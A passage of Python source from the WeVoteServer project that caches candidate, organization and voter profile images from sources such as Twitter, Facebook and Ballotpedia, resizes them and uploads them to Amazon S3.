kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
kind_of_image_large=kind_of_image_large,
kind_of_image_medium=kind_of_image_medium,
kind_of_image_tiny=kind_of_image_tiny)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
if kind_of_image_facebook_profile or kind_of_image_facebook_background:
# image url is valid so store source image of facebook to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_facebook_info(
we_vote_image, facebook_user_id, image_width, image_height,
image_url_https, same_day_image_version, kind_of_image_facebook_profile,
kind_of_image_facebook_background)
elif kind_of_image_twitter_profile or kind_of_image_twitter_background or kind_of_image_twitter_banner:
# image url is valid so store source image of twitter to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_twitter_info(
we_vote_image, twitter_id, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_twitter_profile, kind_of_image_twitter_background, kind_of_image_twitter_banner)
elif kind_of_image_maplight:
# image url is valid so store source image of maplight to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_maplight_info(
we_vote_image, maplight_id, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_maplight)
elif kind_of_image_vote_smart:
# image url is valid so store source image of maplight to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_vote_smart_info(
we_vote_image, vote_smart_id, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_vote_smart)
elif kind_of_image_issue:
# image url is valid so store source image of issue to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_issue_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version)
elif kind_of_image_ballotpedia_profile:
# image url is valid so store source image of ballotpedia to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_ballotpedia_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_ballotpedia_profile)
elif kind_of_image_campaignx_photo:
# Update this new image with width, height, original url and version number
save_source_info_results = we_vote_image_manager.save_we_vote_image_campaignx_info(
we_vote_image=we_vote_image,
image_width=image_width,
image_height=image_height,
image_url_https=image_url_https,
same_day_image_version=same_day_image_version,
)
elif kind_of_image_linkedin_profile:
# image url is valid so store source image of linkedin to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_linkedin_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_linkedin_profile)
elif kind_of_image_wikipedia_profile:
# image url is valid so store source image of wikipedia to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_wikipedia_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_wikipedia_profile)
elif kind_of_image_other_source:
# image url is valid so store source image from other source to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_other_source_info(
we_vote_image, image_width, image_height, other_source, image_url_https, same_day_image_version,
kind_of_image_other_source)
else:
save_source_info_results = {
'status': "KIND_OF_IMAGE_INVALID ",
'success': False,
'we_vote_image': None,
}
status += " " + save_source_info_results['status']
if save_source_info_results['success']:
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
# ex twitter_profile_image_master-2017210_1_48x48.png
we_vote_image_file_name = "{image_type}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=image_type,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
if voter_we_vote_id:
we_vote_image_file_location = voter_we_vote_id + "/" + we_vote_image_file_name
elif campaignx_we_vote_id:
we_vote_image_file_location = campaignx_we_vote_id + "/" + we_vote_image_file_name
elif candidate_we_vote_id:
we_vote_image_file_location = candidate_we_vote_id + "/" + we_vote_image_file_name
elif organization_we_vote_id:
we_vote_image_file_location = organization_we_vote_id + "/" + we_vote_image_file_name
elif issue_we_vote_id:
we_vote_image_file_location = issue_we_vote_id + "/" + we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_image_locally(
image_url_https, we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " IMAGE_STORED_LOCALLY "
resized_image_created = we_vote_image_manager.resize_we_vote_master_image(
image_local_path=we_vote_image_file_name,
image_width=image_width,
image_height=image_height,
image_type=image_type,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y)
if not resized_image_created:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " RESIZED_IMAGE_CREATED "
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location, image_format)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS",
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': False,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
# if we_vote_image_url is not empty then save we_vote_image_wes_info else delete we_vote_image entry
if we_vote_image_url is not None and we_vote_image_url != "":
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(
we_vote_image=we_vote_image,
we_vote_image_url=we_vote_image_url,
we_vote_image_file_location=we_vote_image_file_location,
we_vote_parent_image_id=we_vote_parent_image_id,
is_active_version=is_active_version)
else:
status += " WE_VOTE_IMAGE_URL_IS_EMPTY"
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status']
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
else:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': False,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
return results
def create_resized_images(
voter_we_vote_id=None,
campaignx_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
twitter_profile_image_url_https=None,
twitter_profile_background_image_url_https=None,
twitter_profile_banner_url_https=None,
facebook_profile_image_url_https=None,
facebook_background_image_url_https=None,
maplight_image_url_https=None,
vote_smart_image_url_https=None,
ballotpedia_profile_image_url=None,
campaignx_photo_url_https=None,
linkedin_profile_image_url=None,
wikipedia_profile_image_url=None,
other_source_image_url=None):
"""
Create resized images
:param voter_we_vote_id:
:param campaignx_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param maplight_image_url_https:
:param vote_smart_image_url_https:
:param ballotpedia_profile_image_url:
:param campaignx_photo_url_https:
:param linkedin_profile_image_url:
:param wikipedia_profile_image_url:
:param other_source_image_url:
:return:
"""
cached_master_image_url = None
cached_resized_image_url_large = None
cached_resized_image_url_medium = None
cached_resized_image_url_tiny = None
we_vote_image_manager = WeVoteImageManager()
# Retrieve cached master image url from WeVoteImage table
cached_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
kind_of_image_original=True)
if cached_we_vote_image_results['success']:
cached_we_vote_image = cached_we_vote_image_results['we_vote_image']
cached_master_image_url = cached_we_vote_image.we_vote_image_url
# Create resized image if not created before
create_resized_image_results = create_resized_image_if_not_created(cached_we_vote_image)
# Retrieve resized large version image url
if create_resized_image_results['cached_large_image']:
cached_resized_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
kind_of_image_large=True)
if cached_resized_we_vote_image_results['success']:
cached_resized_we_vote_image = cached_resized_we_vote_image_results['we_vote_image']
cached_resized_image_url_large = cached_resized_we_vote_image.we_vote_image_url
if create_resized_image_results['cached_medium_image']:
# Retrieve resized medium version image url
cached_resized_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
kind_of_image_medium=True)
if cached_resized_we_vote_image_results['success']:
cached_resized_we_vote_image = cached_resized_we_vote_image_results['we_vote_image']
cached_resized_image_url_medium = cached_resized_we_vote_image.we_vote_image_url
if create_resized_image_results['cached_tiny_image']:
# Retrieve resized tiny version image url
cached_resized_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url, other_source_image_url=other_source_image_url,
kind_of_image_tiny=True)
if cached_resized_we_vote_image_results['success']:
cached_resized_we_vote_image = cached_resized_we_vote_image_results['we_vote_image']
cached_resized_image_url_tiny = cached_resized_we_vote_image.we_vote_image_url
results = {
'cached_master_image_url': cached_master_image_url,
'cached_resized_image_url_large': cached_resized_image_url_large,
'cached_resized_image_url_medium': cached_resized_image_url_medium,
'cached_resized_image_url_tiny': cached_resized_image_url_tiny
}
return results
def cache_master_and_resized_image(
twitter_id=None,
twitter_screen_name=None,
twitter_profile_image_url_https=None,
twitter_profile_background_image_url_https=None,
twitter_profile_banner_url_https=None,
voter_id=None,
voter_we_vote_id=None,
candidate_id=None,
candidate_we_vote_id=None,
organization_id=None,
organization_we_vote_id=None,
image_source=None,
facebook_user_id=None,
facebook_profile_image_url_https=None,
facebook_background_image_url_https=None,
facebook_background_image_offset_x=None,
facebook_background_image_offset_y=None,
maplight_id=None,
vote_smart_id=None,
maplight_image_url_https=None,
vote_smart_image_url_https=None,
ballotpedia_profile_image_url=None,
linkedin_profile_image_url=None,
wikipedia_profile_image_url=None,
other_source_image_url=None,
other_source=None):
"""
Start with URL of image hosted on another server, cache it on the We Vote network,
as well as re-sized images. Return cached urls
:param twitter_id:
:param twitter_screen_name:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:param voter_id:
:param voter_we_vote_id:
:param candidate_id:
:param candidate_we_vote_id:
:param organization_id:
:param organization_we_vote_id:
:param image_source: 2017-12-12 Currently not used within WeVoteServer
:param facebook_user_id:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:param maplight_id:
:param vote_smart_id:
:param maplight_image_url_https:
:param vote_smart_image_url_https:
:param ballotpedia_profile_image_url:
:param linkedin_profile_image_url:
:param wikipedia_profile_image_url:
:param other_source_image_url:
:param other_source:
:return:
"""
cached_twitter_profile_image_url_https = None
cached_twitter_profile_background_image_url_https = None
cached_twitter_profile_background_image_url_large = None
cached_twitter_profile_banner_url_https = None
cached_twitter_profile_banner_url_large = None
cached_facebook_profile_image_url_https = None
cached_facebook_background_image_url_https = None
cached_facebook_background_image_url_large = None
cached_maplight_image_url_https = None
cached_vote_smart_image_url_https = None
cached_ballotpedia_image_url_https = None
cached_linkedin_image_url_https = None
cached_wikipedia_image_url_https = None
cached_other_source_image_url_https = None
we_vote_hosted_profile_image_url_large = None
we_vote_hosted_profile_image_url_medium = None
we_vote_hosted_profile_image_url_tiny = None
# caching refreshed new images to s3 aws
cache_master_images_results = cache_master_images(
voter_id=voter_id,
voter_we_vote_id=voter_we_vote_id,
candidate_id=candidate_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_user_id=facebook_user_id,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y,
image_source=image_source,
maplight_id=maplight_id,
maplight_image_url_https=maplight_image_url_https,
vote_smart_id=vote_smart_id,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
other_source=other_source)
# If cached master image or image is already cached then create all resized images for master image
if cache_master_images_results['cached_twitter_profile_image'] is True or \
cache_master_images_results['cached_twitter_profile_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https)
cached_twitter_profile_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_twitter_background_image'] is True or \
cache_master_images_results['cached_twitter_background_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https)
cached_twitter_profile_background_image_url_https = create_resized_image_results['cached_master_image_url']
cached_twitter_profile_background_image_url_large = \
create_resized_image_results['cached_resized_image_url_large']
if cache_master_images_results['cached_twitter_banner_image'] is True or \
cache_master_images_results['cached_twitter_banner_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_banner_url_https=twitter_profile_banner_url_https)
cached_twitter_profile_banner_url_https = create_resized_image_results['cached_master_image_url']
cached_twitter_profile_banner_url_large = create_resized_image_results['cached_resized_image_url_large']
if cache_master_images_results['cached_facebook_profile_image'] is True or \
cache_master_images_results['cached_facebook_profile_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
facebook_profile_image_url_https=facebook_profile_image_url_https)
cached_facebook_profile_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_facebook_background_image'] is True or \
cache_master_images_results['cached_facebook_background_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
facebook_background_image_url_https=facebook_background_image_url_https)
cached_facebook_background_image_url_https = create_resized_image_results['cached_master_image_url']
cached_facebook_background_image_url_large = create_resized_image_results['cached_resized_image_url_large']
if cache_master_images_results['cached_maplight_image'] is True or \
cache_master_images_results['cached_maplight_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
maplight_image_url_https=maplight_image_url_https)
cached_maplight_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_vote_smart_image'] is True or \
cache_master_images_results['cached_vote_smart_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
vote_smart_image_url_https=vote_smart_image_url_https)
cached_vote_smart_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_ballotpedia_image'] is True or \
cache_master_images_results['cached_ballotpedia_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
ballotpedia_profile_image_url=ballotpedia_profile_image_url)
cached_ballotpedia_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_linkedin_image'] is True or \
cache_master_images_results['cached_linkedin_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
linkedin_profile_image_url=linkedin_profile_image_url)
cached_linkedin_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_wikipedia_image'] is True or \
cache_master_images_results['cached_wikipedia_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
wikipedia_profile_image_url=wikipedia_profile_image_url)
cached_wikipedia_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_other_source_image'] is True or \
cache_master_images_results['cached_other_source_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
other_source_image_url=other_source_image_url)
cached_other_source_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
results = {
'cached_twitter_profile_image_url_https': cached_twitter_profile_image_url_https,
'cached_twitter_profile_background_image_url_https': cached_twitter_profile_background_image_url_https,
'cached_twitter_profile_background_image_url_large': cached_twitter_profile_background_image_url_large,
'cached_twitter_profile_banner_url_https': cached_twitter_profile_banner_url_https,
'cached_twitter_profile_banner_url_large': cached_twitter_profile_banner_url_large,
'cached_facebook_profile_image_url_https': cached_facebook_profile_image_url_https,
'cached_facebook_background_image_url_https': cached_facebook_background_image_url_https,
'cached_facebook_background_image_url_large': cached_facebook_background_image_url_large,
'cached_maplight_image_url_https': cached_maplight_image_url_https,
'cached_vote_smart_image_url_https': cached_vote_smart_image_url_https,
'cached_ballotpedia_image_url_https': cached_ballotpedia_image_url_https,
'cached_linkedin_image_url_https': cached_linkedin_image_url_https,
'cached_wikipedia_image_url_https': cached_wikipedia_image_url_https,
'cached_other_source_image_url_https': cached_other_source_image_url_https,
'we_vote_hosted_profile_image_url_large': we_vote_hosted_profile_image_url_large,
'we_vote_hosted_profile_image_url_medium': we_vote_hosted_profile_image_url_medium,
'we_vote_hosted_profile_image_url_tiny': we_vote_hosted_profile_image_url_tiny
}
return results
def cache_master_images(
twitter_id=None,
twitter_screen_name=None,
twitter_profile_image_url_https=None,
twitter_profile_background_image_url_https=None,
twitter_profile_banner_url_https=None,
voter_id=None,
voter_we_vote_id=None,
candidate_id=None,
candidate_we_vote_id=None,
organization_id=None,
organization_we_vote_id=None,
image_source=None, facebook_user_id=None,
facebook_profile_image_url_https=None,
facebook_background_image_url_https=None,
facebook_background_image_offset_x=None,
facebook_background_image_offset_y=None,
maplight_id=None,
vote_smart_id=None,
maplight_image_url_https=None,
vote_smart_image_url_https=None,
ballotpedia_profile_image_url=None,
linkedin_profile_image_url=None,
wikipedia_profile_image_url=None,
other_source_image_url=None,
other_source=None):
"""
Collect all kind of images from URLs hosted outside of the We Vote network, and cache them locally
for a candidate or an organization such as profile, background
:param twitter_id:
:param twitter_screen_name:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:param voter_id:
:param voter_we_vote_id:
:param candidate_id:
:param candidate_we_vote_id:
:param organization_id:
:param organization_we_vote_id:
:param image_source: 2017-12-12 Currently not used within WeVoteServer
:param facebook_user_id:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:param maplight_id:
:param maplight_image_url_https:
:param vote_smart_id:
:param vote_smart_image_url_https:
:param ballotpedia_profile_image_url:
:param linkedin_profile_image_url:
:param wikipedia_profile_image_url:
:param other_source_image_url:
:param other_source
:return:
"""
cache_all_kind_of_images_results = {
'image_source': image_source,
'voter_id': voter_id,
'voter_we_vote_id': voter_we_vote_id,
'candidate_id': candidate_id,
'candidate_we_vote_id': candidate_we_vote_id,
'organization_id': organization_id,
'organization_we_vote_id': organization_we_vote_id,
'cached_twitter_profile_image': False,
'cached_twitter_background_image': False,
'cached_twitter_banner_image': False,
'cached_facebook_profile_image': False,
'cached_facebook_background_image': False,
'cached_maplight_image': False,
'cached_vote_smart_image': False,
'cached_ballotpedia_image': False,
'cached_linkedin_image': False,
'cached_wikipedia_image': False,
'cached_other_source_image': False,
}
google_civic_election_id = 0
we_vote_image_manager = WeVoteImageManager()
if not twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_URL_NOT_FOUND
else:
twitter_profile_image_url_https = we_vote_image_manager.twitter_profile_image_url_https_original(
twitter_profile_image_url_https)
if not twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_URL_NOT_FOUND
if not twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_URL_NOT_FOUND
if not facebook_profile_image_url_https:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = FACEBOOK_URL_NOT_FOUND
if not facebook_background_image_url_https:
cache_all_kind_of_images_results['cached_facebook_background_image'] = FACEBOOK_URL_NOT_FOUND
if not maplight_image_url_https:
cache_all_kind_of_images_results['cached_maplight_image'] = MAPLIGHT_URL_NOT_FOUND
if not vote_smart_image_url_https:
cache_all_kind_of_images_results['cached_vote_smart_image'] = VOTE_SMART_URL_NOT_FOUND
if not ballotpedia_profile_image_url:
cache_all_kind_of_images_results['cached_ballotpedia_image'] = BALLOTPEDIA_URL_NOT_FOUND
if not linkedin_profile_image_url:
cache_all_kind_of_images_results['cached_linkedin_image'] = LINKEDIN_URL_NOT_FOUND
if not wikipedia_profile_image_url:
cache_all_kind_of_images_results['cached_wikipedia_image'] = WIKIPEDIA_URL_NOT_FOUND
if not other_source_image_url:
cache_all_kind_of_images_results['cached_other_source_image'] = OTHER_SOURCE_URL_NOT_FOUND
if twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=twitter_profile_image_url_https, voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id, organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id, twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_profile=True, kind_of_image_original=True)
if twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=twitter_profile_background_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_background=True, kind_of_image_original=True)
